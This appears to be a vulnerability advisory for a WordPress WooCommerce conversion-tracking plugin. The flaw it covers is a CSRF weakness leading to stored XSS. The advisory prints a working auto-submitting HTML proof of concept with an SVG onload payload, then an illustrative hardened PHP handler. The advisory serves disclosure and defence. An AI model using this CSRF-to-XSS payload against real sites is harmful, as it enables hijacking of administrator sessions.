WooCommerce Conversion Tracking < 2.0.5 - CSRF to XSS

Description
The plugin's settings page saves its options through an admin-ajax action that lacks CSRF (nonce) checks and does not sanitise the submitted values. An attacker who gets a logged-in administrator to load a crafted page can therefore write an arbitrary string into the settings, which is later rendered unescaped, leading to stored XSS.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="http://wp.lab/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="settings[facebook][enabled]" value="1" />
      <input type="hidden" name="settings[facebook][0][pixel_id]" value='"><svg/onload=alert(/XSS/)>' />
      <input type="hidden" name="action" value="wcct_save_settings" />
    </form>
  </body>
</html>
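The two missing controls named in the description, a nonce check and input sanitisation, plus output escaping, are shown below in a hardened handler for the same AJAX action. This is an added illustration written for this page, not the plugin's own code or the vendor's fix; the function and option names (example_wcct_save_settings, example_wcct_settings, wcct_settings_nonce) are hypothetical, and only the action name wcct_save_settings and the settings field names come from the proof of concept above.

```php
<?php
// Added illustrative example (not the plugin's own code). Function, option
// and nonce names are hypothetical; 'wcct_save_settings' and the field
// names are taken from the advisory's proof of concept.

add_action( 'wp_ajax_wcct_save_settings', 'example_wcct_save_settings' );

function example_wcct_save_settings() {
    // 1. CSRF: require a nonce tied to this user's session. check_ajax_referer()
    //    terminates the request when the nonce is missing or invalid, so a
    //    form auto-submitted from a third-party page is rejected here.
    check_ajax_referer( 'wcct_settings_nonce', '_wpnonce' );

    // 2. Authorisation: a nonce proves intent, not privilege, so check both.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $raw = ( isset( $_POST['settings'] ) && is_array( $_POST['settings'] ) )
        ? wp_unslash( $_POST['settings'] )
        : array();

    // 3. Input sanitisation with an allow-list: only known keys are kept and
    //    each value is coerced to the type it is supposed to have.
    $clean = array( 'facebook' => array( 'enabled' => 0, array( 'pixel_id' => '' ) ) );
    $clean['facebook']['enabled'] = ! empty( $raw['facebook']['enabled'] ) ? 1 : 0;

    $pixel_id = isset( $raw['facebook'][0]['pixel_id'] )
        ? sanitize_text_field( $raw['facebook'][0]['pixel_id'] )
        : '';
    // A pixel id is a decimal number; anything else (such as a tag) is discarded
    // rather than stored.
    $clean['facebook'][0]['pixel_id'] = preg_match( '/^\d{1,20}$/', $pixel_id ) ? $pixel_id : '';

    update_option( 'example_wcct_settings', $clean );
    wp_send_json_success( $clean );
}

// 4. Output escaping when the stored value is rendered back into the form:
//    esc_attr() neutralises a quote-and-tag payload even if one were stored.
function example_wcct_render_pixel_field( $value ) {
    printf(
        '<input type="text" name="settings[facebook][0][pixel_id]" value="%s" />',
        esc_attr( $value )
    );
}
```

The settings form itself has to emit the matching token, for example with wp_nonce_field( 'wcct_settings_nonce', '_wpnonce' ), so that legitimate saves from the admin page carry the nonce that check_ajax_referer() expects. Sanitising on save and escaping on output are independent layers: the first keeps the payload out of the database, the second keeps any value already there from executing.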

Affects Plugin

fixed in version 2.0.5

References

URL https://plugins.trac.wordpress.org/changeset/2220764

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 54986
Verified No
WPVDB ID 10001

Timeline

Publicly Published 2020-01-03
Added 2020-01-03
Last Updated 2020-01-03